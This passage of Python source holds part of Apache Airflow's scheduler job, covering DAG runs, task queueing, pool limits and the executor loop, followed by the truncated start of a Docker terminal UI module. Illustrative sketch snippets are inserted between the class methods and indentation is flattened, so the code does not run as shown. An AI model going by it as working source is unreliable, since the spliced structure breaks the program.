if task_end_dates:
min_task_end_date = min(task_end_dates)
if next_run_date and min_task_end_date and next_run_date > min_task_end_date:
return
if next_run_date and period_end and period_end <= timezone.utcnow():
next_run = dag.create_dagrun(
run_id=DagRun.ID_PREFIX + next_run_date.isoformat(),
execution_date=next_run_date,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False
)
return next_run
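# --- Hedged sketch (plain datetimes, no Airflow objects) of the rule create_dag_run
# applies above: only create a run for next_run_date once its whole schedule period
# has elapsed, and never for future dates or dates past an end_date.
from datetime import datetime, timedelta
def should_create_run(next_run_date, interval, end_date=None, now=None):
    now = now or datetime.utcnow()
    if next_run_date is None or next_run_date > now:
        return False  # never schedule in the future
    if end_date is not None and next_run_date > end_date:
        return False  # respect the DAG/task end_date
    period_end = next_run_date + interval  # '@once' would use next_run_date itself
    return period_end <= now
print(should_create_run(datetime.utcnow() - timedelta(days=2), timedelta(days=1)))   # True
print(should_create_run(datetime.utcnow() - timedelta(hours=1), timedelta(days=1)))  # False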
@provide_session
def _process_task_instances(self, dag, task_instances_list, session=None):
"""
This method schedules the tasks for a single DAG by looking at the
active DAG runs and adding task instances that should run to the
queue.
"""
# update the state of the previously active dag runs
dag_runs = DagRun.find(dag_id=dag.dag_id, state=State.RUNNING, session=session)
active_dag_runs = []
for run in dag_runs:
self.log.info("Examining DAG run %s", run)
# don't consider runs that are executed in the future unless
# specified by config and schedule_interval is None
if run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.error(
"Execution date is in future: %s",
run.execution_date
)
continue
if len(active_dag_runs) >= dag.max_active_runs:
                self.log.info("Number of active dag runs reached max_active_runs.")
break
# skip backfill dagruns for now as long as they are not really scheduled
if run.is_backfill:
continue
# todo: run.dag is transient but needs to be set
run.dag = dag
# todo: preferably the integrity check happens at dag collection time
run.verify_integrity(session=session)
ready_tis = run.update_state(session=session)
if run.state == State.RUNNING:
self.log.debug("Examining active DAG run: %s", run)
for ti in ready_tis:
self.log.debug('Queuing task: %s', ti)
task_instances_list.append(ti.key)
@provide_session
def _change_state_for_tis_without_dagrun(self,
simple_dag_bag,
old_states,
new_state,
session=None):
"""
For all DAG IDs in the SimpleDagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
        normally should not happen, but it can if the state of DagRuns is
changed manually.
:param old_states: examine TaskInstances in this state
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag and with states in the old_states will be examined
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
tis_changed = 0
query = session \
.query(models.TaskInstance) \
.outerjoin(models.DagRun, and_(
models.TaskInstance.dag_id == models.DagRun.dag_id,
models.TaskInstance.execution_date == models.DagRun.execution_date)) \
.filter(models.TaskInstance.dag_id.in_(simple_dag_bag.dag_ids)) \
.filter(models.TaskInstance.state.in_(old_states)) \
.filter(or_(
models.DagRun.state != State.RUNNING,
models.DagRun.state.is_(None)))
# We need to do this for mysql as well because it can cause deadlocks
# as discussed in https://issues.apache.org/jira/browse/AIRFLOW-2516
if self.using_sqlite or self.using_mysql:
tis_to_change = query \
.with_for_update() \
.all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
tis_changed = session \
.query(models.TaskInstance) \
.filter(and_(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date ==
subq.c.execution_date)) \
.update({models.TaskInstance.state: new_state},
synchronize_session=False)
session.commit()
if tis_changed > 0:
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed, new_state
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(self, states, session=None):
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
        :return: A map from dag_id to # of task instances in the given state list
            and a map from (dag_id, task_id) to # of task instances in the given state list
        :rtype: tuple[dict[str, int], dict[tuple[str, str], int]]
"""
TI = models.TaskInstance
ti_concurrency_query = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map = defaultdict(int)
task_map = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
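# --- Illustrative version of the aggregation above using plain tuples instead of the
# SQLAlchemy query: given (task_id, dag_id, count) rows, build one counter keyed by
# dag_id and one keyed by (dag_id, task_id). The row values are made up for the example.
from collections import defaultdict
rows = [("extract", "etl_dag", 3), ("load", "etl_dag", 1), ("train", "ml_dag", 2)]
dag_map, task_map = defaultdict(int), defaultdict(int)
for task_id, dag_id, count in rows:
    dag_map[dag_id] += count
    task_map[(dag_id, task_id)] = count
assert dag_map["etl_dag"] == 4 and task_map[("ml_dag", "train")] == 2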
@provide_session
def _find_executable_task_instances(self, simple_dag_bag, states, session=None):
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param executor: the executor that runs task instances
:type executor: BaseExecutor
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: list[airflow.models.TaskInstance]
"""
from airflow.jobs.backfill_job import BackfillJob # Avoid circular import
executable_tis = []
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
ti_query = (
session
.query(TI)
.filter(TI.dag_id.in_(simple_dag_bag.dag_ids))
.outerjoin(
DR,
and_(DR.dag_id == TI.dag_id, DR.execution_date == TI.execution_date)
)
.filter(or_(DR.run_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DR.run_id.like(BackfillJob.ID_PREFIX + '%'))))
.outerjoin(DM, DM.dag_id == TI.dag_id)
.filter(or_(DM.dag_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DM.is_paused)))
)
# Additional filters on task instance state
if None in states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(states)) # noqa: E711 pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(states))
task_instances_to_examine = ti_query.all()
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(
[repr(x) for x in task_instances_to_examine])
self.log.info(
"%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
task_instance_str
)
# Get the pool settings
pools = {p.pool: p for p in session.query(models.Pool).all()}
pool_to_task_instances = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=STATES_TO_COUNT_AS_RUNNING, session=session)
num_tasks_in_executor = 0
num_starving_tasks_total = 0
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning(
"Tasks using non-existent pool '%s' will not be scheduled",
pool
)
continue
else:
open_slots = pools[pool].open_slots(session=session)
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool, open_slots, num_ready
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))
num_starving_tasks = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info(
"Not scheduling since there are %s open slots in pool %s",
open_slots, pool
)
# Can't schedule any more since there are no more open slots.
num_unhandled = len(priority_sorted_task_instances) - current_index
num_starving_tasks += num_unhandled
num_starving_tasks_total += num_unhandled
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
simple_dag = simple_dag_bag.get_dag(dag_id)
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = simple_dag_bag.get_dag(dag_id).concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id, current_dag_concurrency, dag_concurrency_limit
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance, dag_id, dag_concurrency_limit
)
continue
task_concurrency_limit = simple_dag.get_task_special_arg(
task_instance.task_id,
'task_concurrency')
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info("Not executing %s since the task concurrency for"
" this task has been reached.", task_instance)
continue
if self.executor.has_task(task_instance):
self.log.debug(
"Not handling task %s as the executor reports it is running",
task_instance.key
)
num_tasks_in_executor += 1
continue
if task_instance.pool_slots > open_slots:
self.log.info("Not executing %s since it requires %s slots "
"but there are %s open slots in the pool %s.",
task_instance, task_instance.pool_slots, open_slots, pool)
num_starving_tasks += 1
num_starving_tasks_total += 1
# Though we can execute tasks with lower priority if there's enough room
continue
executable_tis.append(task_instance)
open_slots -= task_instance.pool_slots
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge('pool.starving_tasks.{pool_name}'.format(pool_name=pool_name),
num_starving_tasks)
Stats.gauge('pool.open_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].open_slots())
Stats.gauge('pool.used_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].occupied_slots())
Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks_total)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join(
[repr(x) for x in executable_tis])
self.log.info(
"Setting the following tasks to queued state:\n\t%s", task_instance_str)
        # so these don't expire on commit
for ti in executable_tis:
copy_dag_id = ti.dag_id
copy_execution_date = ti.execution_date
copy_task_id = ti.task_id
make_transient(ti)
ti.dag_id = copy_dag_id
ti.execution_date = copy_execution_date
ti.task_id = copy_task_id
return executable_tis
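# --- Simplified sketch of the pool loop above: sort candidates by priority, then
# greedily take tasks while the pool still has open slots, skipping any whose DAG is
# already at its concurrency limit. TaskStub and the fixed limits are assumptions for
# illustration only, not Airflow objects.
from collections import defaultdict, namedtuple
TaskStub = namedtuple("TaskStub", ["dag_id", "task_id", "priority_weight", "pool_slots"])
def pick_executable(candidates, open_slots, dag_concurrency_limit=16):
    running_per_dag = defaultdict(int)
    picked = []
    for ti in sorted(candidates, key=lambda t: -t.priority_weight):
        if open_slots <= 0:
            break  # pool exhausted; the remaining candidates are "starving"
        if running_per_dag[ti.dag_id] >= dag_concurrency_limit:
            continue  # DAG concurrency limit reached
        if ti.pool_slots > open_slots:
            continue  # needs more slots than remain in the pool
        picked.append(ti)
        open_slots -= ti.pool_slots
        running_per_dag[ti.dag_id] += 1
    return picked
tasks = [TaskStub("d1", "a", 10, 1), TaskStub("d1", "b", 5, 2), TaskStub("d2", "c", 7, 1)]
print(pick_executable(tasks, open_slots=2))  # picks "a" then "c"; no slots left for "b"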
@provide_session
def _change_state_for_executable_task_instances(self, task_instances,
acceptable_states, session=None):
"""
Changes the state of task instances in the list with one of the given states
to QUEUED atomically, and returns the TIs changed in SimpleTaskInstance format.
:param task_instances: TaskInstances to change the state of
:type task_instances: list[airflow.models.TaskInstance]
:param acceptable_states: Filters the TaskInstances updated to be in these states
:type acceptable_states: Iterable[State]
:rtype: list[airflow.utils.dag_processing.SimpleTaskInstance]
"""
if len(task_instances) == 0:
session.commit()
return []
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == ti.dag_id,
TI.task_id == ti.task_id,
TI.execution_date == ti.execution_date)
for ti in task_instances])
ti_query = (
session
.query(TI)
.filter(or_(*filter_for_ti_state_change)))
if None in acceptable_states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(acceptable_states)) # noqa pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(acceptable_states))
tis_to_set_to_queued = (
ti_query
.with_for_update()
.all())
if len(tis_to_set_to_queued) == 0:
self.log.info("No tasks were able to have their state changed to queued.")
session.commit()
return []
# set TIs to queued state
for task_instance in tis_to_set_to_queued:
task_instance.state = State.QUEUED
task_instance.queued_dttm = timezone.utcnow()
session.merge(task_instance)
# Generate a list of SimpleTaskInstance for the use of queuing
# them in the executor.
simple_task_instances = [SimpleTaskInstance(ti) for ti in
tis_to_set_to_queued]
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_queued])
session.commit()
self.log.info("Setting the following %s tasks to queued state:\n\t%s",
len(tis_to_set_to_queued), task_instance_str)
return simple_task_instances
def _enqueue_task_instances_with_queued_state(self, simple_dag_bag,
simple_task_instances):
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param simple_task_instances: TaskInstances to enqueue
:type simple_task_instances: list[SimpleTaskInstance]
        :param simple_dag_bag: Should contain all of the task_instances' DAGs
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
TI = models.TaskInstance
# actually enqueue them
for simple_task_instance in simple_task_instances:
simple_dag = simple_dag_bag.get_dag(simple_task_instance.dag_id)
command = TI.generate_command(
simple_task_instance.dag_id,
simple_task_instance.task_id,
simple_task_instance.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=simple_task_instance.pool,
file_path=simple_dag.full_filepath,
pickle_id=simple_dag.pickle_id)
priority = simple_task_instance.priority_weight
queue = simple_task_instance.queue
self.log.info(
"Sending %s to executor with priority %s and queue %s",
simple_task_instance.key, priority, queue
)
self.executor.queue_command(
simple_task_instance,
command,
priority=priority,
queue=queue)
@provide_session
def _execute_task_instances(self,
simple_dag_bag,
states,
session=None):
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
        and that we do not exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
        :return: Number of task instances with state changed.
"""
executable_tis = self._find_executable_task_instances(simple_dag_bag, states,
session=session)
def query(result, items):
simple_tis_with_state_changed = \
self._change_state_for_executable_task_instances(items,
states,
session=session)
self._enqueue_task_instances_with_queued_state(
simple_dag_bag,
simple_tis_with_state_changed)
session.commit()
return result + len(simple_tis_with_state_changed)
return helpers.reduce_in_chunks(query, executable_tis, 0, self.max_tis_per_query)
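# --- Hedged sketch of the chunked-reduce pattern used above. The real helper is
# airflow.utils.helpers.reduce_in_chunks; this standalone version only illustrates the
# idea of folding a callable over bounded chunks so each DB round trip queues a
# limited number of task instances.
def reduce_in_chunks_sketch(fn, iterable, initializer, chunk_size=0):
    if chunk_size <= 0:
        chunk_size = max(len(iterable), 1)
    result = initializer
    for start in range(0, len(iterable), chunk_size):
        result = fn(result, iterable[start:start + chunk_size])
    return result
# Example: count five items in chunks of two, mirroring how the scheduler sums the
# number of task instances whose state it changed per chunk.
print(reduce_in_chunks_sketch(lambda acc, chunk: acc + len(chunk), list(range(5)), 0, 2))  # 5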
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if self.executor.queued_tasks:
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# The TI.try_number will return raw try_number+1 since the
                    # ti is not running, so we subtract 1 to match the DB record.
TI._try_number == try_number - 1,
TI.state == State.QUEUED)
for dag_id, task_id, execution_date, try_number
in self.executor.queued_tasks.keys()])
ti_query = (session.query(TI)
.filter(or_(*filter_for_ti_state_change)))
tis_to_set_to_scheduled = (ti_query
.with_for_update()
.all())
if len(tis_to_set_to_scheduled) == 0:
session.commit()
return
            # set the TIs back to the SCHEDULED state
for task_instance in tis_to_set_to_scheduled:
task_instance.state = State.SCHEDULED
task_instance.queued_dttm = None
self.executor.queued_tasks.pop(task_instance.key)
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_scheduled])
session.commit()
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
def _process_dags(self, dagbag, dags, tis_out):
"""
Iterates over the dags and processes them. Processing includes:
1. Create appropriate DagRun(s) in the DB.
2. Create appropriate TaskInstance(s) in the DB.
3. Send emails for tasks that have missed SLAs.
:param dagbag: a collection of DAGs to process
:type dagbag: airflow.models.DagBag
:param dags: the DAGs from the DagBag to process
:type dags: list[airflow.models.DAG]
        :param tis_out: A list to which generated TaskInstance objects are added
:type tis_out: list[TaskInstance]
:rtype: None
"""
for dag in dags:
dag = dagbag.get_dag(dag.dag_id)
if not dag:
self.log.error("DAG ID %s was not found in the DagBag", dag.dag_id)
continue
self.log.info("Processing %s", dag.dag_id)
dag_run = self.create_dag_run(dag)
if dag_run:
expected_start_date = dag.following_schedule(dag_run.execution_date)
if expected_start_date:
schedule_delay = dag_run.start_date - expected_start_date
Stats.timing(
'dagrun.schedule_delay.{dag_id}'.format(dag_id=dag.dag_id),
schedule_delay)
self.log.info("Created %s", dag_run)
self._process_task_instances(dag, tis_out)
if conf.getboolean('core', 'CHECK_SLAS', fallback=True):
self.manage_slas(dag)
@provide_session
def _process_executor_events(self, simple_dag_bag, session=None):
"""
Respond to executor events.
"""
# TODO: this shares quite a lot of code with _manage_executor_state
TI = models.TaskInstance
for key, state in list(self.executor.get_event_buffer(simple_dag_bag.dag_ids)
.items()):
dag_id, task_id, execution_date, try_number = key
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
dag_id, task_id, execution_date, state, try_number
)
if state == State.FAILED or state == State.SUCCESS:
qry = session.query(TI).filter(TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date)
ti = qry.first()
if not ti:
                    self.log.warning(
                        "TaskInstance %s.%s (execution_date=%s) went missing from the database",
                        dag_id, task_id, execution_date)
continue
# TODO: should we fail RUNNING as well, as we do in Backfills?
if ti.try_number == try_number and ti.state == State.QUEUED:
                    msg = ("Executor reports task instance {} finished ({}) "
                           "although the task says it's {}. Was the task "
                           "killed externally?".format(ti, state, ti.state))
Stats.incr('scheduler.tasks.killed_externally')
self.log.error(msg)
try:
simple_dag = simple_dag_bag.get_dag(dag_id)
dagbag = models.DagBag(simple_dag.full_filepath)
dag = dagbag.get_dag(dag_id)
ti.task = dag.get_task(task_id)
ti.handle_failure(msg)
except Exception:
self.log.error("Cannot load the dag bag to handle failure for %s"
". Setting task to FAILED without callbacks or "
"retries. Do you have enough resources?", ti)
ti.state = State.FAILED
session.merge(ti)
session.commit()
def _execute(self):
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = False
if self.do_pickle and self.executor.__class__ not in \
(executors.LocalExecutor, executors.SequentialExecutor):
pickle_dags = True
self.log.info("Running execute loop for %s seconds", self.run_duration)
self.log.info("Processing each file at most %s times", self.num_runs)
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self.subdir)
known_file_paths = list_py_file_paths(self.subdir)
self.log.info("There are %s files in %s", len(known_file_paths), self.subdir)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(self.subdir,
known_file_paths,
self.num_runs,
type(self)._create_dag_file_processor,
processor_timeout,
self.dag_ids,
pickle_dags,
async_mode)
try:
self._execute_helper()
except Exception:
self.log.exception("Exception when executing execute_helper")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
@staticmethod
def _create_dag_file_processor(file_path, zombies, dag_ids, pickle_dags):
"""
Creates DagFileProcessorProcess instance.
"""
return DagFileProcessor(file_path,
pickle_dags,
dag_ids,
zombies)
def _get_simple_dags(self):
return self.processor_agent.harvest_simple_dags()
def _execute_helper(self):
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/img/scheduler_loop.jpg
:rtype: None
"""
self.executor.start()
self.log.info("Resetting orphaned tasks for active dag runs")
self.reset_state_for_orphaned_tasks()
# Start after resetting orphaned tasks to avoid stressing out DB.
self.processor_agent.start()
execute_start_time = timezone.utcnow()
# Last time that self.heartbeat() was called.
last_self_heartbeat_time = timezone.utcnow()
# For the execute duration, parse and schedule DAGs
while (timezone.utcnow() - execute_start_time).total_seconds() < \
self.run_duration or self.run_duration < 0:
self.log.debug("Starting Loop...")
loop_start_time = time.time()
if self.using_sqlite:
self.processor_agent.heartbeat()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug(
"Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
self.log.debug("Harvesting DAG parsing results")
simple_dags = self._get_simple_dags()
            self.log.debug("Harvested %d SimpleDAGs", len(simple_dags))
# Send tasks for execution if available
simple_dag_bag = SimpleDagBag(simple_dags)
if not self._validate_and_run_task_instances(simple_dag_bag=simple_dag_bag):
continue
# Heartbeat the scheduler periodically
time_since_last_heartbeat = (timezone.utcnow() -
last_self_heartbeat_time).total_seconds()
if time_since_last_heartbeat > self.heartrate:
self.log.debug("Heartbeating the scheduler")
self.heartbeat()
last_self_heartbeat_time = timezone.utcnow()
is_unit_test = conf.getboolean('core', 'unit_test_mode')
loop_end_time = time.time()
loop_duration = loop_end_time - loop_start_time
self.log.debug(
"Ran scheduling loop in %.2f seconds",
loop_duration)
if not is_unit_test:
self.log.debug("Sleeping for %.2f seconds", self._processor_poll_interval)
time.sleep(self._processor_poll_interval)
if self.processor_agent.done:
self.log.info("Exiting scheduler loop as all files"
" have been processed {} times".format(self.num_runs))
break
if loop_duration < 1 and not is_unit_test:
sleep_length = 1 - loop_duration
self.log.debug(
"Sleeping for {0:.2f} seconds to prevent excessive logging"
.format(sleep_length))
sleep(sleep_length)
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s",
execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove()
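# --- Hedged sketch of the loop pacing used in _execute_helper above: pad each
# scheduler iteration to at least roughly one second so an empty loop does not spin
# and flood the logs. `body` is any callable standing in for one scheduling pass.
import time
def pace_loop(body, min_loop_seconds=1.0):
    start = time.time()
    body()
    elapsed = time.time() - start
    if elapsed < min_loop_seconds:
        time.sleep(min_loop_seconds - elapsed)
# pace_loop(lambda: None)  # a no-op pass would still take about one second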
def _validate_and_run_task_instances(self, simple_dag_bag):
if len(simple_dag_bag.simple_dags) > 0:
try:
self._process_and_execute_tasks(simple_dag_bag)
except Exception as e:
self.log.error("Error queuing tasks")
self.log.exception(e)
return False
# Call heartbeats
self.log.debug("Heartbeating the executor")
self.executor.heartbeat()
self._change_state_for_tasks_failed_to_execute()
# Process events from the executor
self._process_executor_events(simple_dag_bag)
return True
def _process_and_execute_tasks(self, simple_dag_bag):
# Handle cases where a DAG run state is set (perhaps manually) to
# a non-running state. Handle task instances that belong to
# DAG runs in those states
# If a task instance is up for retry but the corresponding DAG run
# isn't running, mark the task instance as FAILED so we don't try
# to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.UP_FOR_RETRY],
State.FAILED)
# If a task instance is scheduled or queued or up for reschedule,
# but the corresponding DAG run isn't running, set the state to
# NONE so we don't try to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.QUEUED,
State.SCHEDULED,
State.UP_FOR_RESCHEDULE],
State.NONE)
self._execute_task_instances(simple_dag_bag,
(State.SCHEDULED,))
@provide_session
def process_file(self, file_path, zombies, pickle_dags=False, session=None):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
        Returns a list of SimpleDag objects that represent the DAGs found in
        the file, together with the number of import errors for that file.
:param file_path: the path to the Python file that should be executed
:type file_path: unicode
:param zombies: zombie task instances to kill.
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
        :param pickle_dags: whether to serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
        :return: a list of SimpleDags made from the Dags found in the file,
            and the number of import errors for that file
        :rtype: tuple[list[airflow.utils.dag_processing.SimpleDag], int]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
# As DAGs are parsed from this file, they will be converted into SimpleDags
simple_dags = []
try:
dagbag = models.DagBag(file_path, include_examples=False)
except Exception:
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return [], []
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return [], len(dagbag.import_errors)
# Save individual DAGs in the ORM and update DagModel.last_scheduled_time
for dag in dagbag.dags.values():
dag.sync_to_db()
paused_dag_ids = models.DagModel.get_paused_dag_ids(dag_ids=dagbag.dag_ids)
# Pickle the DAGs (if necessary) and put them into a SimpleDag
for dag_id in dagbag.dags:
# Only return DAGs that are not paused
if dag_id not in paused_dag_ids:
dag = dagbag.get_dag(dag_id)
pickle_id = None
if pickle_dags:
pickle_id = dag.pickle(session).id
simple_dags.append(SimpleDag(dag, pickle_id=pickle_id))
if len(self.dag_ids) > 0:
dags = [dag for dag in dagbag.dags.values()
if dag.dag_id in self.dag_ids and
dag.dag_id not in paused_dag_ids]
else:
dags = [dag for dag in dagbag.dags.values()
if not dag.parent_dag and
dag.dag_id not in paused_dag_ids]
# Not using multiprocessing.Queue() since it's no longer a separate
# process and due to some unusual behavior. (empty() incorrectly
# returns true as described in https://bugs.python.org/issue23582 )
ti_keys_to_schedule = []
self._process_dags(dagbag, dags, ti_keys_to_schedule)
for ti_key in ti_keys_to_schedule:
dag = dagbag.dags[ti_key[0]]
task = dag.get_task(ti_key[1])
ti = models.TaskInstance(task, ti_key[2])
ti.refresh_from_db(session=session, lock_for_update=True)
# We check only deps needed to set TI to SCHEDULED state here.
# Deps needed to set TI to QUEUED state will be batch checked later
# by the scheduler for better performance.
dep_context = DepContext(deps=SCHEDULED_DEPS, ignore_task_deps=True)
# Only schedule tasks that have their dependencies met, e.g. to avoid
            # overwriting the state of a task that was recently set to RUNNING by
            # something other than the scheduler.
if ti.are_dependencies_met(
dep_context=dep_context,
session=session,
verbose=True):
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# If the task is dummy, then mark it as done automatically
if isinstance(ti.task, DummyOperator) \
and not ti.task.on_success_callback:
ti.state = State.SUCCESS
ti.start_date = ti.end_date = timezone.utcnow()
ti.duration = 0
# Also save this task instance to the DB.
self.log.info("Creating / updating %s in ORM", ti)
session.merge(ti)
# commit batch
session.commit()
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception:
self.log.exception("Error logging import errors!")
try:
dagbag.kill_zombies(zombies)
except Exception:
self.log.exception("Error killing zombies!")
return simple_dags, len(dagbag.import_errors)
@provide_session
def heartbeat_callback(self, session=None):
Stats.incr('scheduler_heartbeat', 1, 1)
|
init.py
|
"""
Application specific code.
"""
import logging
import threading
from sen.exceptions import NotifyError
from sen.tui.commands.base import Commander, SameThreadPriority
from sen.tui.commands.display import DisplayListingCommand
from sen.tui.ui import get_app_in_loop
from sen.tui.constants import PALLETE
from sen.docker_backend import DockerBackend
logger = logging.getLogger(__name__)
class Application:
def __init__(self, yolo=False):
self.d = DockerBackend()
self.loop, self.ui = get_app_in_loop(PALLETE)
self.ui.yolo = yolo
self.ui.commander = Commander(self.ui, self.d)
self.rt_thread = threading.Thread(target=self.realtime_updates, daemon=True)
self.rt_thread.start()
def run(self):
self.ui.run_command(DisplayListingCommand.name, queue=SameThreadPriority())
self.loop.run()
def realtime_updates(self):
"""
fetch realtime events from docker and pass them to buffers
:return: None
"""
# TODO: make this available for every buffer
logger.info("starting receiving events from docker")
it = self.d.realtime_updates()
while True:
try:
event = next(it)
except NotifyError as ex:
self.ui.notify_message("error when receiving realtime events from docker: %s" % ex,
level="error")
return
# FIXME: we should pass events to all buffers
# ATM the buffers can't be rendered since they are not displayed
# and hence traceback like this: ListBoxError("Listbox contents too short! ...
logger.debug("pass event to current buffer %s", self.ui.current_buffer)
try:
self.ui.current_buffer.process_realtime_event(event)
